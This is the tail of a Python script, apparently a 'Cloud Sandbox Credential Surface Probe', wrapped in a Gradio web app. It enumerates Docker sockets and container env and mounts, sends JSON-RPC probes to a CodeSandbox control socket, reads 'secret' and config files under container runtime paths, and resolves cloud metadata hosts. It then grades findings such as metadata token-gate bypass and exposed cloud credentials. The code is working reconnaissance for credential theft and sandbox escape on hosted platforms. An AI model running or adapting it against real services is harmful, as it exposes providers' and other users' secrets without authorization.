| else: | |
| entry["env"].append(e) | |
| mounts = inspect.get("Mounts", []) | |
| entry["mounts"] = [{ | |
| "type": m.get("Type"), "src": m.get("Source"), | |
| "dst": m.get("Destination"), "rw": m.get("RW"), | |
| } for m in mounts] | |
| hc = inspect.get("HostConfig", {}) | |
| entry["privileged"] = hc.get("Privileged") | |
| entry["pid_mode"] = hc.get("PidMode") | |
| entry["network_mode"] = hc.get("NetworkMode") | |
| entry["cap_add"] = hc.get("CapAdd") | |
| except Exception as exc: | |
| entry["inspect_error"] = f"{type(exc).__name__}: {exc}" | |
| result["containers"].append(entry) | |
| # List images | |
| img_raw = uds_http_get(sock_path, "/images/json") | |
| images = json.loads(img_raw) | |
| result["image_count"] = len(images) | |
| result["images"] = [{ | |
| "id_short": img.get("Id", "")[:20], | |
| "tags": img.get("RepoTags", []), | |
| "size_mb": round(img.get("Size", 0) / 1048576, 1), | |
| } for img in images[:15]] | |
| except Exception as exc: | |
| result["error"] = f"{type(exc).__name__}: {exc}" | |
| return result | |
| def _probe_pitcher_socket(sock_path): | |
| """Probe CodeSandbox pitcher socket – try HTTP and JSON protocols.""" | |
| result = {"socket_path": sock_path, "exists": os.path.exists(sock_path), | |
| "accessible": False, "http_hints": [], "json_hints": []} | |
| if not result["exists"]: | |
| return result | |
| # HTTP attempts | |
| for method_path in [("GET", "/"), ("GET", "/health"), ("GET", "/status")]: | |
| method, path = method_path | |
| try: | |
| s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) | |
| s.settimeout(2) | |
| s.connect(sock_path) | |
| req = f"{method} {path} HTTP/1.0\r\nHost: localhost\r\n\r\n" | |
| s.sendall(req.encode()) | |
| resp = s.recv(2048).decode("utf-8", errors="replace") | |
| s.close() | |
| result["accessible"] = True | |
| result["http_hints"].append({ | |
| "request": f"{method} {path}", | |
| "response_preview": sanitize_preview(resp, 300), | |
| }) | |
| except Exception as exc: | |
| result["http_hints"].append({ | |
| "request": f"{method} {path}", | |
| "error": f"{type(exc).__name__}: {exc}", | |
| }) | |
| # JSON-RPC / custom JSON attempts | |
| json_payloads = [ | |
| {"jsonrpc": "2.0", "method": "list", "id": 1}, | |
| {"jsonrpc": "2.0", "method": "help", "id": 2}, | |
| {"jsonrpc": "2.0", "method": "status", "id": 3}, | |
| {"jsonrpc": "2.0", "method": "ls", "params": {"path": "/"}, "id": 4}, | |
| {"type": "list"}, | |
| {"type": "status"}, | |
| {"type": "readdir", "params": {"path": "/"}}, | |
| {"action": "list_files", "path": "/"}, | |
| ] | |
| for payload in json_payloads: | |
| try: | |
| resp = uds_send_json(sock_path, payload, timeout=2) | |
| result["accessible"] = True | |
| result["json_hints"].append({ | |
| "request": payload, | |
| "response_preview": sanitize_preview(resp, 300), | |
| }) | |
| except Exception as exc: | |
| result["json_hints"].append({ | |
| "request": payload, | |
| "error": f"{type(exc).__name__}: {exc}", | |
| }) | |
| return result | |
| # --------------------------------------------------------------------------- | |
| # Container runtime artifacts (Podman/crun/libpod) | |
| # --------------------------------------------------------------------------- | |
| def collect_container_runtime_artifacts(): | |
| results = [] | |
| for path in PODMAN_ARTIFACT_PATHS: | |
| info = list_directory(path, limit=30) | |
| if info.get("exists"): | |
| results.append(info) | |
| # Read JSON configs under libpod / crun | |
| for base in PODMAN_ARTIFACT_PATHS: | |
| target = normalize_path(base) | |
| if not os.path.isdir(target): | |
| continue | |
| for root, dirs, files in os.walk(target): | |
| for f in files: | |
| if f.endswith(".json") or "config" in f.lower() or "secret" in f.lower(): | |
| fpath = os.path.join(root, f) | |
| results.append(read_preview(fpath, limit=1024)) | |
| if len(results) > 30: | |
| break | |
| return results | |
| # --------------------------------------------------------------------------- | |
| # DNS resolution | |
| # --------------------------------------------------------------------------- | |
| def resolve_hosts(): | |
| hosts = ["metadata.google.internal", "169.254.169.254", "100.100.100.200"] | |
| results = [] | |
| for h in hosts: | |
| started = time.time() | |
| try: | |
| infos = socket.getaddrinfo(h, 80, type=socket.SOCK_STREAM) | |
| addrs = sorted({i[4][0] for i in infos}) | |
| results.append({"hostname": h, "ok": True, "addresses": addrs, | |
| "latency_ms": round((time.time() - started) * 1000, 2)}) | |
| except Exception as exc: | |
| results.append({"hostname": h, "ok": False, | |
| "error": f"{type(exc).__name__}: {exc}", | |
| "latency_ms": round((time.time() - started) * 1000, 2)}) | |
| return results | |
| # --------------------------------------------------------------------------- | |
| # Assessment (channel-mapped) | |
| # --------------------------------------------------------------------------- | |
| def build_assessment(report): | |
| """Produce a concise, channel-mapped assessment with severity.""" | |
| channels = report["channels"] | |
| findings = [] | |
| # CH1 | |
| ch1 = channels["ch1_imds_mmds"] | |
| if ch1["status"] == "token_gate_bypassed": | |
| findings.append({ | |
| "channel": 1, "name": "IMDS/MMDS", | |
| "severity": "high", | |
| "title": "MMDS token gate bypassed – full keyspace readable", | |
| "detail": "IMDSv2 PUT from within sandbox returns a valid session token; " | |
| "MMDS data including additional_files is fully accessible.", | |
| "evidence_keys": ["channels.ch1_imds_mmds.mmds_dump"], | |
| }) | |
| elif ch1["status"] == "directly_reachable": | |
| findings.append({ | |
| "channel": 1, "name": "IMDS/MMDS", | |
| "severity": "high", | |
| "title": "Metadata endpoint directly reachable without any gate", | |
| "detail": f"Reachable probes: {ch1['directly_reachable']}", | |
| }) | |
| elif ch1["status"] == "token_gated": | |
| findings.append({ | |
| "channel": 1, "name": "IMDS/MMDS", | |
| "severity": "medium", | |
| "title": "MMDS token-gated – token acquisition failed", | |
| "detail": "Endpoint responds with 401; PUT token attempts did not succeed.", | |
| }) | |
| # CH2 | |
| ch2 = channels["ch2_ecs_endpoint"] | |
| if ch2["status"] == "detected": | |
| findings.append({ | |
| "channel": 2, "name": "ECS Container Endpoint", | |
| "severity": "high", | |
| "title": "ECS credential endpoint reachable", | |
| "detail": "AWS_CONTAINER_CREDENTIALS env var present and endpoint returned credentials.", | |
| }) | |
| # CH3 | |
| ch3 = channels["ch3_irsa_wi"] | |
| if ch3["status"] == "detected": | |
| findings.append({ | |
| "channel": 3, "name": "IRSA/WI Projected Volume", | |
| "severity": "high", | |
| "title": "Workload identity token file accessible", | |
| "detail": f"Pointers: {[p['env_key'] for p in ch3['pointers']]}", | |
| }) | |
| # CH4 | |
| ch4 = channels["ch4_k8s_sa_token"] | |
| if ch4["status"] == "detected": | |
| findings.append({ | |
| "channel": 4, "name": "K8s SA Token", | |
| "severity": "medium", | |
| "title": "Kubernetes service account token present", | |
| "detail": f"JWT-like: {ch4.get('jwt_like')}, " | |
| f"namespace: {ch4.get('namespace', 'unknown')}", | |
| }) | |
| # CH5 | |
| ch5 = channels["ch5_sdk_config"] | |
| if ch5["status"] == "detected": | |
| findings.append({ | |
| "channel": 5, "name": "SDK Config Files", | |
| "severity": "high", | |
| "title": "Cloud SDK credential files found on disk", | |
| "detail": f"Files: {[f['path'] for f in ch5['files']]}", | |
| }) | |
| # CH6 | |
| ch6 = channels["ch6_env_injection"] | |
| if ch6["status"] == "detected": | |
| cp = ch6["cross_process"] | |
| findings.append({ | |
| "channel": 6, "name": "ENV Injection", | |
| "severity": "medium", | |
| "title": f"Sensitive env vars detected " | |
| f"(current={ch6['current_process_interesting_count']}, " | |
| f"cross-proc={cp.get('finding_count', 0)})", | |
| "detail": f"Cross-process readable: {cp.get('pids_readable', 0)}" | |
| f"/{cp.get('pids_sampled', 0)} pids", | |
| }) | |
| # CH7 | |
| ch7 = channels["ch7_credential_helper"] | |
| if ch7["status"] == "detected": | |
| findings.append({ | |
| "channel": 7, "name": "Credential Helper", | |
| "severity": "medium", | |
| "title": f"Docker credential helpers found: " | |
| f"{[h['name'] for h in ch7['helpers']]}", | |
| "detail": f"Config: {ch7.get('config_path')}", | |
| }) | |
| # CH8 | |
| ch8 = channels["ch8_sidecar_proxy"] | |
| if ch8["status"] == "possible": | |
| findings.append({ | |
| "channel": 8, "name": "Sidecar/Proxy", | |
| "severity": "info", | |
| "title": "Proxy or traffic redirect indicators detected", | |
| "detail": f"Indicators: {len(ch8['indicators'])}", | |
| }) | |
| # CH9 | |
| ch9 = channels["ch9_uds_proxy"] | |
| if ch9["status"] == "detected": | |
| docker_ok = (ch9.get("docker_probe") or {}).get("accessible", False) | |
| pitcher_ok = (ch9.get("pitcher_probe") or {}).get("accessible", False) | |
| parts = [] | |
| if docker_ok: | |
| n = ch9["docker_probe"].get("container_count", 0) | |
| parts.append(f"docker.sock accessible ({n} containers)") | |
| if pitcher_ok: | |
| parts.append("pitcher socket accessible") | |
| findings.append({ | |
| "channel": 9, "name": "UDS Proxy", | |
| "severity": "high" if docker_ok else "medium", | |
| "title": "; ".join(parts) if parts else f"{ch9['total_count']} sockets found", | |
| "detail": f"Docker: {docker_ok}, Pitcher: {pitcher_ok}, " | |
| f"Total sockets: {ch9['total_count']}", | |
| }) | |
| # Overall severity | |
| sevs = [f["severity"] for f in findings] | |
| if "high" in sevs: | |
| overall = "high" | |
| elif "medium" in sevs: | |
| overall = "medium" | |
| elif findings: | |
| overall = "low" | |
| else: | |
| overall = "none" | |
| # Channel summary | |
| channel_summary = {} | |
| for i in range(1, 10): | |
| key = f"ch{i}_{['', 'imds_mmds', 'ecs_endpoint', 'irsa_wi','k8s_sa_token', 'sdk_config', 'env_injection','credential_helper', 'sidecar_proxy', 'uds_proxy'][i]}" | |
| ch_data = channels.get(key, {}) | |
| channel_summary[f"channel_{i}"] = ch_data.get("status", "not_checked") | |
| return { | |
| "overall_severity": overall, | |
| "finding_count": len(findings), | |
| "channel_summary": channel_summary, | |
| "findings": findings, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Main | |
| # --------------------------------------------------------------------------- | |
| def parse_args(): | |
| parser = argparse.ArgumentParser( | |
| description="Cloud Sandbox Credential Surface Probe v2") | |
| parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT) | |
| parser.add_argument("--json-out", help="Write JSON report to file") | |
| return parser.parse_args() | |
| def main(): | |
| args = parse_args() | |
| t = args.timeout | |
| report = { | |
| "version": "2.0", | |
| "timestamp": int(time.time()), | |
| "runtime": get_runtime(), | |
| "dns": resolve_hosts(), | |
| "runtime_context": collect_runtime_context(), | |
| "channels": { | |
| "ch1_imds_mmds": collect_channel_1(t), | |
| "ch2_ecs_endpoint": collect_channel_2(t), | |
| "ch3_irsa_wi": collect_channel_3(), | |
| "ch4_k8s_sa_token": collect_channel_4(), | |
| "ch5_sdk_config": collect_channel_5(), | |
| "ch6_env_injection": collect_channel_6(), | |
| "ch7_credential_helper": collect_channel_7(), | |
| "ch8_sidecar_proxy": collect_channel_8(), | |
| "ch9_uds_proxy": collect_channel_9(t), | |
| }, | |
| "container_runtime_artifacts": collect_container_runtime_artifacts(), | |
| } | |
| report["assessment"] = build_assessment(report) | |
| return report | |
| def probe_environment(): | |
| output = main() | |
| return output | |
| with gr.Blocks() as demo: | |
| gr.Markdown("## 环境探测器") | |
| out = gr.Textbox(label="探测结果", lines=20) | |
| btn = gr.Button("开始探测") | |
| btn.click(fn=probe_environment, inputs=[], outputs=out) | |
| demo.launch() |